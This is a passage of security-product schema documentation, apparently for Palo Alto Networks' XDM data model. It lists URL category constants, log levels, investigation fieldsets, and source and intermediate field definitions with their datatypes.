11 XDM_CONST.URL_CATEGORY_CRYPTOCURRENCY Websites that promote cryptocurrencies, crypto mining websites (but not embedded crypto miners), cryptocurrency exchanges and vendors, and websites that manage cryptocurrency wallets and ledgers. This category does not include traditional financial services websites that reference cryptocurrencies, websites that explain and describe how cryptocurrencies and blockchains work, or websites that contain embedded cryptocurrency miners (grayware).
12 XDM_CONST.URL_CATEGORY_DATING Websites offering online dating services, advice, and other personal ads
13 XDM_CONST.URL_CATEGORY_DYNAMIC_DNS Hosts and domain names for systems with dynamically assigned IP addresses and which are oftentimes used to deliver malware payloads or C2 traffic. Also, dynamic DNS domains do not go through the same vetting process as domains that are registered by a reputable domain registration company, and are therefore less trustworthy.
14 XDM_CONST.URL_CATEGORY_EDUCATIONAL_INSTITUTIONS Official websites for schools, colleges, universities, school districts, online classes, and other academic institutions. These refer to larger, established educational institutions such as elementary schools, high schools, universities, etc. Tutoring academies can go here as well.
15 XDM_CONST.URL_CATEGORY_ENTERTAINMENT_AND_ARTS Sites for movies, television, radio, videos, programming guides/tools, comics, performing arts, museums, art galleries, or libraries. Includes sites for entertainment, celebrity and industry news.
16 XDM_CONST.URL_CATEGORY_EXTREMISM Websites promoting terrorism, racism, fascism, or other extremist views discriminating against people or groups of different ethnic backgrounds, religions or other beliefs. This category was introduced to enable adherence to child protection laws required in the education industry. In some regions, laws and regulations may prohibit allowing access to extremist sites, and allowing access may pose a liability risk.
17 XDM_CONST.URL_CATEGORY_FINANCIAL_SERVICES Websites pertaining to personal financial information or advice, such as online banking, loans, mortgages, debt management, credit card companies, and insurance companies. Does not include sites relating to stock markets, brokerages or trading services. Includes sites for foreign currency exchange.
18 XDM_CONST.URL_CATEGORY_GAMBLING Lottery or gambling websites that facilitate the exchange of real and/or virtual money. Related websites that provide information, tutorials or advice regarding gambling, including betting odds and pools. Corporate websites for hotels and casinos that do not enable gambling are categorized under Travel.
19 XDM_CONST.URL_CATEGORY_GAMES Sites that provide online play or download of video and/or computer games, game reviews, tips, or cheats, as well as instructional sites for non-electronic games, sale/trade of board games, or related publications/media. Includes sites that support or host online sweepstakes and/or giveaways.
20 XDM_CONST.URL_CATEGORY_GOVERNMENT Official websites for local, state, and national governments, as well as related agencies, services, or laws.
21 XDM_CONST.URL_CATEGORY_GRAYWARE Web content that does not pose a direct security threat but that displays other obtrusive behavior and tempts the end user to grant remote access or perform other unauthorized actions. Grayware includes illegal activities, criminal activities, rogueware, adware, and other unwanted or unsolicited applications, such as embedded crypto miners, clickjacking or hijackers that change the elements of the browser. Typosquatting domains that do not exhibit maliciousness and are not owned by the targeted domain will be categorized as grayware.
22 XDM_CONST.URL_CATEGORY_HACKING Sites relating to the illegal or questionable access to or the use of communications equipment/software. Development and distribution of programs, how-to-advice and/or tips that may result in the compromise of networks and systems. Also includes sites that facilitate the bypass of licensing and digital rights systems.
23 XDM_CONST.URL_CATEGORY_HEALTH_AND_MEDICINE Sites containing information regarding general health information, issues, and traditional and non-traditional tips, remedies, and treatments. Also includes sites for various medical specialties, practices and facilities (such as gyms and fitness clubs) as well as professionals. Sites relating to medical insurance and cosmetic surgery are also included.
24 XDM_CONST.URL_CATEGORY_HOME_AND_GARDEN Information, products, and services regarding home repair and maintenance, architecture, design, construction, décor, and gardening.
25 XDM_CONST.URL_CATEGORY_HUNTING_AND_FISHING Hunting and fishing tips, instructions, sale of related equipment and paraphernalia.
26 XDM_CONST.URL_CATEGORY_INSUFFICIENT_CONTENT Websites and services that present test pages, no content, provide API access not intended for end-user display or require authentication without displaying any other content suggesting a different categorization. Should not include websites providing remote access, such as web based VPN solutions, web based email services or identified credential phishing pages.
27 XDM_CONST.URL_CATEGORY_INTERNET_COMMUNICATIONS_AND_TELEPHONY Sites that support or provide services for video chatting, instant messaging, or telephony capabilities.
28 XDM_CONST.URL_CATEGORY_INTERNET_PORTALS Sites that serve as a starting point for users, usually by aggregating a broad set of content and topics.
29 XDM_CONST.URL_CATEGORY_JOB_SEARCH Sites that provide job listings and employer reviews, interview advice and tips, or related services for both employers and prospective candidates.
30 XDM_CONST.URL_CATEGORY_LEGAL Information, analysis or advice regarding the law, legal services, legal firms, or other legal related issues.
31 XDM_CONST.URL_CATEGORY_MALWARE Sites known to host malware or used for command and control (C2) traffic. May also exhibit Exploit Kits.
32 XDM_CONST.URL_CATEGORY_MILITARY Information or commentary regarding military branches, recruitment, current or past operations, or any related paraphernalia.
33 XDM_CONST.URL_CATEGORY_MOTOR_VEHICLES Information relating to reviews, sales and trading, modifications, parts, and other related discussions for automobiles, motorcycles, boats, trucks and RVs.
34 XDM_CONST.URL_CATEGORY_MUSIC Music sales, distribution, or information. Includes websites for music artists, groups, labels, events, lyrics, and other information regarding the music business. Does not include streaming music.
35 XDM_CONST.URL_CATEGORY_NEWLY_REGISTERED_DOMAIN Newly registered domains are often generated purposely or by domain generation algorithms and used for malicious activity.
36 XDM_CONST.URL_CATEGORY_NEWS Online publications, newswire services, and other websites that aggregate current events, weather, or other contemporary issues. Includes newspapers, radio stations, magazines, and podcasts.
37 XDM_CONST.URL_CATEGORY_NOT_RESOLVED Indicates that the website was not found in the local URL filtering database and the firewall was unable to connect to the cloud database to check the category. When a URL category lookup is performed, the firewall first checks the dataplane cache for the URL; if no match is found, it will then check the management plane cache, and if no match is found there, it queries the URL database in the cloud. When deciding on what action to take for traffic that is categorized as not-resolved, be aware that setting the action to block may be very disruptive to users.
38 XDM_CONST.URL_CATEGORY_NUDITY Sites that contain nude or seminude depictions of the human body, regardless of context or intent, such as artwork. Includes nudist or naturist sites containing images of participants.
39 XDM_CONST.URL_CATEGORY_ONLINE_STORAGE_AND_BACKUP Websites that provide online storage of files for free and as a service.
40 XDM_CONST.URL_CATEGORY_PARKED Domains registered by individuals, oftentimes later found to be used for credential phishing. These domains may be similar to legitimate domains, for example, pal0alto0netw0rks.com, with the intent of phishing for credentials or personal identity information. Or, they may be domains that an individual purchases rights to in hopes that it may be valuable someday, such as panw.net.
41 XDM_CONST.URL_CATEGORY_PEER_TO_PEER Sites that provide access to or clients for peer-to-peer sharing of torrents, download programs, media files, or other software applications. This is primarily for those sites that provide bittorrent download capabilities. Does not include shareware or freeware sites.
42 XDM_CONST.URL_CATEGORY_PERSONAL_SITES_AND_BLOGS Personal websites and blogs by individuals or groups. Should try to first categorize based on content. For example, if someone has a blog just about cars, then the site should be categorized under "motor vehicles". However, if the site is a pure blog, then it should remain under "personal sites and blogs".
43 XDM_CONST.URL_CATEGORY_PHILOSOPHY_AND_POLITICAL_ADVOCACY Sites containing information, viewpoints or campaigns regarding philosophical or political views.
44 XDM_CONST.URL_CATEGORY_PHISHING Web content that covertly attempts to fool the user in order to harvest information, including login credentials, credit card information (voluntarily or involuntarily), account numbers, PINs, and any information considered to be personally identifiable information (PII) from victims via social engineering techniques. Technical support scams and scareware are also included as phishing.
45 XDM_CONST.URL_CATEGORY_PRIVATE_IP_ADDRESSES This category includes IP addresses defined in RFC 1918, Address Allocation for Private Intranets. It also includes domains not registered with the public DNS system (*.local and *.onion).
46 XDM_CONST.URL_CATEGORY_PROXY_AVOIDANCE_AND_ANONYMIZERS URLs and services often used to bypass content filtering products.
47 XDM_CONST.URL_CATEGORY_QUESTIONABLE Websites containing tasteless humor, offensive content targeting specific demographics of individuals or groups of people.
48 XDM_CONST.URL_CATEGORY_REAL_ESTATE Information on property rentals, sales and related tips or information. Includes sites for real estate agents, firms, rental services, listings (and aggregates), and property improvement.
49 XDM_CONST.URL_CATEGORY_RECREATION_AND_HOBBIES Information, forums, associations, groups, and publications on recreations and hobbies.
50 XDM_CONST.URL_CATEGORY_REFERENCE_AND_RESEARCH Personal, professional, or academic reference portals, materials, or services. Includes online dictionaries, maps, almanacs, census information, libraries, genealogy and scientific information.
51 XDM_CONST.URL_CATEGORY_RELIGION Information regarding various religions, related activities or events. Includes websites for religious organizations, officials and places of worship. Includes sites for fortune telling.
52 XDM_CONST.URL_CATEGORY_SEARCH_ENGINES Sites that provide a search interface using keywords, phrases, or other parameters that may return information, websites, images or files as results.
53 XDM_CONST.URL_CATEGORY_SEX_EDUCATION Information on reproduction, sexual development, safe sex practices, sexually transmitted diseases, birth control, tips for better sex, as well as any related products or related paraphernalia. Includes websites for related groups, forums or organizations.
54 XDM_CONST.URL_CATEGORY_SHAREWARE_AND_FREEWARE Sites that provide access to software, screensavers, icons, wallpapers, utilities, ringtones, themes or widgets for free and/or donations. Also includes open source projects.
55 XDM_CONST.URL_CATEGORY_SHOPPING Sites that facilitate the purchase of goods and services. Includes online merchants, websites for department stores, retail stores, catalogs, as well as sites that aggregate and monitor prices. Sites listed here should be online merchants that sell a variety of items (or whose main purpose is online sales). A webpage for a cosmetics company that also happens to allow online purchasing should be categorized with cosmetics and not shopping.
56 XDM_CONST.URL_CATEGORY_SOCIAL_NETWORKING User communities and sites where users interact with each other, post messages, pictures, or otherwise communicate with groups of people. Does not include blogs or personal sites.
57 XDM_CONST.URL_CATEGORY_SOCIETY Topics relating to the general population, issues that impact a large variety of people, such as fashion, beauty, philanthropic groups, societies, or children. Also includes websites designed for children as well as restaurant websites.
58 XDM_CONST.URL_CATEGORY_SPORTS Information about sporting events, athletes, coaches, officials, teams or organizations, sports scores, schedules and related news, and any related paraphernalia. Includes websites regarding fantasy sports and other virtual sports leagues.
59 XDM_CONST.URL_CATEGORY_STOCK_ADVICE_AND_TOOLS Information regarding the stock market, trading of stocks or options, portfolio management, investment strategies, quotes, or related news.
60 XDM_CONST.URL_CATEGORY_STREAMING_MEDIA Sites that stream audio or video content for free and/or purchase. Includes online radio stations and other streaming music services.
61 XDM_CONST.URL_CATEGORY_SWIMSUITS_AND_INTIMATE_APPAREL Sites that include information or images concerning swimsuits, intimate apparel or other suggestive clothing.
62 XDM_CONST.URL_CATEGORY_TRAINING_AND_TOOLS Sites that provide online education and training and related materials. Can include driving/traffic schools, workplace training, etc.
63 XDM_CONST.URL_CATEGORY_TRANSLATION Sites that provide translation services, including both user input and URL translations. These sites can also allow users to circumvent filtering as the target page's content is presented within the context of the translator's URL.
64 XDM_CONST.URL_CATEGORY_TRAVEL Information regarding travel tips, deals, pricing information, destination information, tourism, and related services. Includes websites for hotels, local attractions, casinos, airlines, cruise lines, travel agencies, vehicle rentals and sites that provide booking tools such as price monitors. Includes websites for local points of interest/tourist attractions such as the Eiffel Tower, the Grand Canyon, etc.
65 XDM_CONST.URL_CATEGORY_UNKNOWN Sites that have not yet been identified by PAN-DB. If availability is critical to your business and you must allow the traffic, alert on unknown sites, apply the best practice Security profiles to the traffic, and investigate the alerts.
66 XDM_CONST.URL_CATEGORY_WEAPONS Sales, reviews, descriptions of or instructions regarding weapons and their use.
68 XDM_CONST.URL_CATEGORY_WEB_HOSTING Free or paid for hosting services for web pages, including information regarding web development, publication, promotion, and other methods to increase traffic.
69 XDM_CONST.URL_CATEGORY_WEB_BASED_EMAIL Any website that provides access to an email inbox and the ability to send and receive emails.
3.32 | XDM_CONST.DNS_RESPONSE_CODE
Response code. See RCODE in RFC 1035.
No error XDM_CONST.DNS_RESPONSE_CODE_NO_ERROR
3.33 | XDM_CONST.DNS_RECORD_TYPE
The DNS record type
3.34 | XDM_CONST.OPERATION_TYPE
The operation type
IMAGE_MPROTECT XDM_CONST.OPERATION_TYPE_IMAGE_MPROTECT The operation changes the memory protection of an image file.
AUTH_MFA XDM_CONST.OPERATION_TYPE_AUTH_MFA The operation authorizes an account using Multi-factor authentication (MFA).
3.35 | XDM_CONST.IDENTITY_TYPE
BUILTIN XDM_CONST.IDENTITY_TYPE_BUILTIN The identity is a built-in system account that is always present on the system.
3.36 | XDM_CONST.SCOPE_TYPE
The user's scope.
3.37 | XDM_CONST.LOG_LEVEL
The event's level of importance.
8000 XDM_CONST.LOG_LEVEL_EMERGENCY Indicates a catastrophic failure, system-wide issue, or security incident that requires immediate attention.
7000 XDM_CONST.LOG_LEVEL_ALERT Indicates a severe issue or security event that requires immediate attention but does not necessarily mean that the application or system has completely failed or has been compromised.
6000 XDM_CONST.LOG_LEVEL_CRITICAL Indicates a critical error or problem which prevents the application from continuing to run.
5000 XDM_CONST.LOG_LEVEL_ERROR Indicates an error or problem that has occurred, but the application can still continue running.
4000 XDM_CONST.LOG_LEVEL_WARNING Indicates a potential problem or a potential security issue that should be addressed.
3000 XDM_CONST.LOG_LEVEL_NOTICE Provides non-critical information that may be helpful for troubleshooting or debugging purposes. This level is typically used for messages that are more informational than warning or error messages.
2000 XDM_CONST.LOG_LEVEL_INFORMATIONAL Provides general information, such as startup messages or progress updates.
1000 XDM_CONST.LOG_LEVEL_DEBUG Provides fine-grained informational messages that are typically only relevant during debugging or investigation.
4 | XDM Fieldsets
4.1 | fieldset.xdm_core
Returns a pre-defined set of the most relevant XDM schema fields:
• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.user.user_type
• xdm.source.sent_bytes
• xdm.source.agent.identifier
• xdm.source.user_agent
• xdm.source.process.name
• xdm.source.process.executable.path
• xdm.source.process.executable.filename
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.user.user_type
• xdm.target.sent_bytes
• xdm.target.agent.identifier
• xdm.target.url
• xdm.target.domain
• xdm.target.process.name
• xdm.target.process.executable.path
• xdm.target.process.executable.filename
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product
• xdm.event.is_completed
• xdm.event.duration
4.2 | fieldset.xdm_cloud
Returns a pre-defined set of the most relevant XDM schema fields for cloud investigation:
• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.cloud.provider
• xdm.source.zone
• xdm.source.cloud.region
• xdm.source.cloud.project
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.cloud.provider
• xdm.target.zone
• xdm.target.cloud.region
• xdm.target.cloud.project
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product
4.3 | fieldset.xdm_endpoint
Returns a pre-defined set of the most relevant XDM schema fields for endpoint investigation:
• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.host.os
• xdm.source.host.ipv4_addresses
• xdm.source.user.username
• xdm.source.process.name
• xdm.source.process.command_line
• xdm.source.process.executable.signer
• xdm.source.process.executable.md5
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.host.os
• xdm.target.host.ipv4_addresses
• xdm.target.user.username
• xdm.target.process.name
• xdm.target.process.command_line
• xdm.target.file.filename
• xdm.target.domain
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product
4.4 | fieldset.xdm_identity
Returns a pre-defined set of the most relevant XDM schema fields for identity investigation:
• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.user.sam_account_name
• xdm.source.user.domain
• xdm.source.user.user_type
• xdm.source.user.first_name
• xdm.source.user.last_name
• xdm.source.user.identifier
• xdm.source.user.identity_type
• xdm.source.user.scope
• xdm.source.location.country
• xdm.logon.type
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.user.sam_account_name
• xdm.target.user.domain
• xdm.target.user.user_type
• xdm.target.user.first_name
• xdm.target.user.last_name
• xdm.target.user.identifier
• xdm.target.user.identity_type
• xdm.target.user.scope
• xdm.target.location.country
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product
4.5 | fieldset.xdm_network
Returns a pre-defined set of the most relevant XDM schema fields for network investigation:
• _time
• xdm.event.type
• xdm.event.description
• xdm.event.operation
• xdm.event.operation_sub_type
• xdm.source.ipv4
• xdm.source.port
• xdm.source.host.hostname
• xdm.source.user.username
• xdm.source.user.user_type
• xdm.source.sent_bytes
• xdm.source.location.country
• xdm.target.ipv4
• xdm.target.port
• xdm.target.host.hostname
• xdm.target.user.username
• xdm.target.user.user_type
• xdm.target.sent_bytes
• xdm.target.location.country
• xdm.network.ip_protocol
• xdm.network.application_protocol
• xdm.target.url
• xdm.target.domain
• xdm.target.resource.name
• xdm.target.resource.type
• xdm.network.http.url
• xdm.network.http.method
• xdm.event.outcome
• xdm.event.outcome_reason
• xdm.observer.product
5 | XDM Fields
5.1 | xdm.session_context_id
Description A unique ID that identifies the user session, or the context of multiple events belonging to the same activity, and can be used to correlate those events.
Datatype String
Dataclass Scalar
5.2 | xdm.event
An event that occurred
xdm.event.id
Datatype String
Dataclass Scalar
xdm.event.type
Datatype String
Dataclass Scalar
xdm.event.original_event_type
Datatype String
Dataclass Scalar
xdm.event.operation
Datatype XDM_CONST.OPERATION_TYPE
Dataclass Scalar
xdm.event.operation_sub_type
Datatype String
Dataclass Scalar
xdm.event.description
Datatype String
Dataclass Scalar
xdm.event.tags
Datatype XDM_CONST.EVENT_TAG
Dataclass Array
xdm.event.outcome
Datatype XDM_CONST.OUTCOME
Dataclass Scalar
xdm.event.outcome_reason
Datatype String
Dataclass Scalar
xdm.event.duration
Description The amount of time, in milliseconds, for the completion of the action.
Datatype Number
Dataclass Scalar
xdm.event.is_completed
Datatype Boolean
Dataclass Scalar
xdm.event.log_level
Datatype XDM_CONST.LOG_LEVEL
Dataclass Scalar
5.3 | xdm.source
Information about the source of the activity
xdm.source.host
xdm.source.host.hostname
Description The host name of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.os_family
Description The operating system of the source host that initiated the activity.
Datatype XDM_CONST.OS_FAMILY
Dataclass Scalar
xdm.source.host.os
Description The specific operating system of the source host that initiated the activity, including version.
Datatype String
Dataclass Scalar
xdm.source.host.fqdn
Description The fully-qualified domain name (FQDN) of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.device_category
Description The device category of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.device_model
Description The device model of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.device_id
Description The unique device ID of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.ipv4_addresses
Description The IPv4 addresses of the source host that initiated the activity.
Datatype IPv4
Dataclass Array
xdm.source.host.ipv6_addresses
Description The IPv6 addresses of the source host that initiated the activity.
Datatype IPv6
Dataclass Array
xdm.source.host.ipv4_public_addresses
Description The IPv4 public addresses of the source host that initiated the activity.
Datatype IPv4
Dataclass Array
xdm.source.host.ipv6_public_addresses
Description The IPv6 public addresses of the source host that initiated the activity.
Datatype IPv6
Dataclass Array
xdm.source.host.mac_addresses
Description The MAC addresses of the source host that initiated the activity.
Datatype String
Dataclass Array
xdm.source.host.manufacturer
Description The device manufacturer of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.hardware_uuid
Description The unique hardware manufacturing ID of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.boot_time
Description The last known start up time of the source host that initiated the activity.
Datatype Timestamp
Dataclass Scalar
xdm.source.host.image
Description The image/runtime name/ID of the source host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.host.memory
Description The memory capacity size in bytes of the source host that initiated the activity.
Datatype Number
Dataclass Scalar
xdm.source.agent
xdm.source.agent.identifier
Description The ID of the agent on the host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.agent.type
Description The type of the agent on the host that initiated the activity.
Datatype XDM_CONST.AGENT_TYPE
Dataclass Scalar
xdm.source.agent.version
Description The version of the agent on the host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.agent.content_version
Description The content version of the agent on the host that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.agent.installation_time
Description The installation time of the agent on the host that initiated the activity.
Datatype Timestamp
Dataclass Scalar
xdm.source.user
xdm.source.user.identifier
Description The ID of the user, such as GUID, SID or any other ID that uniquely identifies the user who initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.user.username
Description The user name used for identification of the user who initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.user.user_type
Datatype XDM_CONST.USER_TYPE
Dataclass Scalar
xdm.source.user.first_name
Description The first name of the user who initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.user.last_name
Description The last name of the user who initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.user.middle_name
Description The middle name of the user who initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.user.employee_id
Datatype String
Dataclass Scalar
xdm.source.user.badge_id
Description The work badge ID of the user who initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.user.ou
Description The organization unit of the user who initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.user.domain
Description The domain to which the user who initiated the activity belongs.
Datatype String
Dataclass Scalar
xdm.source.user.is_password_changeable
Description Whether the password of the user who initiated the activity is changeable.
Datatype Boolean
Dataclass Scalar
xdm.source.user.is_password_expired
Description Whether the password of the user who initiated the activity has expired.
Datatype Boolean
Dataclass Scalar
xdm.source.user.is_password_required
Description Whether the password of the user who initiated the activity is required.
Datatype Boolean
Dataclass Scalar
xdm.source.user.is_disabled
Datatype Boolean
Dataclass Scalar
xdm.source.user.groups
Description The groups or roles to which the user who initiated the activity belongs.
Datatype String
Dataclass Array
xdm.source.user.netbios_domain
Description The NetBIOS subdomain of the DNS domain name of the user who initiated the activity. See https://docs.microsoft.com/en-us/exchange/disjoint-namespace-scenarios-exchange-2013-help#dns-and-netbios-domain-names (auto-enriched field).
Datatype String
Dataclass Scalar
Examples mycompany
Enriched True
xdm.source.user.sam_account_name
Description The logon name of the user who initiated the activity. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#samaccountname (auto-enriched field).
Datatype String
Dataclass Scalar
Examples jondoe
Enriched True
xdm.source.user.upn
Description The principal name of the user who initiated the activity. See https://docs.microsoft.com/en-us/windows/win32/ad/naming-properties#userprincipalname (auto-enriched field).
Datatype String
Dataclass Scalar
Examples [email protected]
Enriched True
xdm.source.user.identity_type
Description The identity type of the user who initiated the activity (auto-enriched field).
Datatype XDM_CONST.IDENTITY_TYPE
Dataclass Scalar
Enriched True
xdm.source.user.scope
Description The scope of the user who initiated the activity (auto-enriched field).
Datatype XDM_CONST.SCOPE_TYPE
Dataclass Scalar
Enriched True
xdm.source.location
xdm.source.location.country
Datatype String
Dataclass Scalar
Examples Japan
Enriched True
xdm.source.location.city
Datatype String
Dataclass Scalar
Examples Tokyo
Enriched True
xdm.source.location.continent
Datatype String
Dataclass Scalar
Examples Asia
Enriched True
xdm.source.location.region
Datatype String
Dataclass Scalar
Examples Tokyo
Enriched True
xdm.source.location.latitude
Datatype Float
Dataclass Scalar
Examples 45.505918
Enriched True
xdm.source.location.longitude
Datatype Float
Dataclass Scalar
Examples -73.61483
Enriched True
xdm.source.location.timezone
Description Timezone in Continent/City format of the source host (auto-enriched field).
Datatype String
Dataclass Scalar
Examples Asia/Tokyo
Enriched True
xdm.source.process
xdm.source.process.name
Datatype String
Dataclass Scalar
xdm.source.process.pid
Datatype Number
Dataclass Scalar
xdm.source.process.identifier
Datatype String
Dataclass Scalar
xdm.source.process.command_line
Datatype String
Dataclass Scalar
xdm.source.process.causality_id
Description The ID of the root process that triggered the chain that the source process is a part of.
Datatype String
Dataclass Scalar
xdm.source.process.parent_id
Description The ID of the direct parent process that triggered the source process.
Datatype String
Dataclass Scalar
xdm.source.process.integrity_level
Description The mode of operation level in which the source process is running.
Datatype Number
Dataclass Scalar
xdm.source.process.executable
xdm.source.process.executable.filename
Datatype String
Dataclass Scalar
xdm.source.process.executable.path
Datatype String
Dataclass Scalar
xdm.source.process.executable.directory
Datatype String
Dataclass Scalar
xdm.source.process.executable.extension
Datatype String
Dataclass Scalar
xdm.source.process.executable.file_type
Datatype String
Dataclass Scalar
xdm.source.process.executable.md5
Description The MD5 hash signature for the source process executable content.
Datatype MD5
Dataclass Scalar
xdm.source.process.executable.sha256
Description The SHA256 hash signature for the source process executable content.
Datatype SHA256
Dataclass Scalar
xdm.source.process.executable.is_signed
Description Whether the loaded module of the source process executable is signed.
Datatype Boolean
Dataclass Scalar
Examples True
xdm.source.process.executable.signer
Datatype String
Dataclass Scalar
xdm.source.process.executable.signature_status
Datatype XDM_CONST.SIGNATURE_STATUS
Dataclass Scalar
xdm.source.process.executable.size
Datatype Number
Dataclass Scalar
xdm.source.process.thread_id
Datatype Number
Dataclass Scalar
xdm.source.process.is_injected
Description Whether the source process's thread/activity is executed via process injection.
Datatype Boolean
Dataclass Scalar
xdm.source.process.container_id
Datatype String
Dataclass Scalar
xdm.source.application
xdm.source.application.name
Description The name of the source application that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.application.version
Description The version of the source application that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.application.publisher
Description The publisher (vendor/company) of the source application that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.application.installation_timestamp
Description The installation time of the source application that initiated the activity.
Datatype String
Dataclass Scalar
xdm.source.application.from_appstore
Description Whether the source application that initiated the activity was installed from an application store.
Datatype Boolean
Dataclass Scalar
xdm.source.user_agent
Datatype String
Dataclass Scalar
xdm.source.ipv4
Datatype IPv4
Dataclass Scalar
xdm.source.ipv6
Datatype IPv6
Dataclass Scalar
xdm.source.asn
The source IP address.
xdm.source.asn.as_number
Description The autonomous system number (ASN) of the source IP address (auto-enriched field).
Datatype Number
Dataclass Scalar
Examples 54538
Enriched True
xdm.source.asn.as_name
Description The autonomous system name of the source IP address (auto-enriched field).
Datatype String
Dataclass Scalar
Enriched True
xdm.source.asn.isp
Datatype String
Dataclass Scalar
xdm.source.asn.domain
Datatype String
Dataclass Scalar
xdm.source.asn.is_proxy
Description Indicates whether the autonomous system of the source IP address is a proxy/VPN address (auto-enriched field).
Datatype Boolean
Dataclass Scalar
Enriched True
xdm.source.is_internal_ip
Datatype Boolean
Dataclass Scalar
Enriched True
xdm.source.port
Datatype Number
Dataclass Scalar
xdm.source.sent_bytes
Datatype Number
Dataclass Scalar
xdm.source.sent_packets
Datatype Number
Dataclass Scalar
xdm.source.interface
Description The source interface address (usually the MAC address).
Datatype String
Dataclass Scalar
xdm.source.zone
Datatype String
Dataclass Scalar
xdm.source.subnet
Datatype String
Dataclass Scalar
xdm.source.vlan
Datatype Number
Dataclass Scalar
xdm.source.cloud
xdm.source.cloud.provider
Datatype XDM_CONST.CLOUD_PROVIDER
Dataclass Scalar
xdm.source.cloud.geo_region
Datatype String
Dataclass Scalar
xdm.source.cloud.region
Datatype String
Dataclass Scalar
xdm.source.cloud.zone
Description The cloud zone (sub-region) within a given region of the cloud provider.
Datatype String
Dataclass Scalar
Examples us-east-1a
xdm.source.cloud.project
Datatype String
Dataclass Scalar
xdm.source.cloud.project_hierarchy
Datatype String
Dataclass Array
xdm.source.cloud.project_id
Datatype String
Dataclass Scalar
5.4 | xdm.intermediate
Information about an intermediate entity, such as a NAT, VPN or proxy device
xdm.intermediate.host
xdm.intermediate.host.hostname
Description The host name of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.os_family
Description The operating system of the intermediate device that handled the activity.
Datatype XDM_CONST.OS_FAMILY
Dataclass Scalar
xdm.intermediate.host.os
Description The specific operating system of the intermediate device that handled the activity, including version.
Datatype String
Dataclass Scalar
xdm.intermediate.host.fqdn
Description The fully-qualified domain name (FQDN) of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.device_category
Description The device category of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.device_model
Description The device model of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.device_id
Description The unique device ID of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.ipv4_addresses
Description The IPv4 addresses of the intermediate device that handled the activity.
Datatype IPv4
Dataclass Array
xdm.intermediate.host.ipv6_addresses
Description The IPv6 addresses of the intermediate device that handled the activity.
Datatype IPv6
Dataclass Array
xdm.intermediate.host.ipv4_public_addresses
Description The IPv4 public addresses of the intermediate device that handled the activity.
Datatype IPv4
Dataclass Array
xdm.intermediate.host.ipv6_public_addresses
Description The IPv6 public addresses of the intermediate device that handled the activity.
Datatype IPv6
Dataclass Array
xdm.intermediate.host.mac_addresses
Description The MAC addresses of the intermediate device that handled the activity.
Datatype String
Dataclass Array
xdm.intermediate.host.manufacturer
Description The device manufacturer of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.hardware_uuid
Description The unique hardware manufacturing ID of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.boot_time
Description The last known start up time of the intermediate device that handled the activity.
Datatype Timestamp
Dataclass Scalar
xdm.intermediate.host.image
Description The image/runtime name/ID of the intermediate device that handled the activity.
Datatype String
Dataclass Scalar
xdm.intermediate.host.memory
Description The memory capacity size in bytes of the intermediate device that handled the activity.
Datatype Number
Dataclass Scalar
xdm.intermediate.location
xdm.intermediate.location.country
Datatype String
Dataclass Scalar
Examples Japan
Enriched True
xdm.intermediate.location.city
Datatype String
Dataclass Scalar
Examples Tokyo
Enriched True
xdm.intermediate.location.continent
Datatype String
Dataclass Scalar
Examples Asia
Enriched True
xdm.intermediate.location.region
Datatype String
Dataclass Scalar
Examples Tokyo
Enriched True
xdm.intermediate.location.latitude
Datatype Float
Dataclass Scalar
Examples 45.505918
Enriched True
xdm.intermediate.location.longitude
Datatype Float
Dataclass Scalar
Examples -73.61483
Enriched True
xdm.intermediate.location.timezone
Datatype String
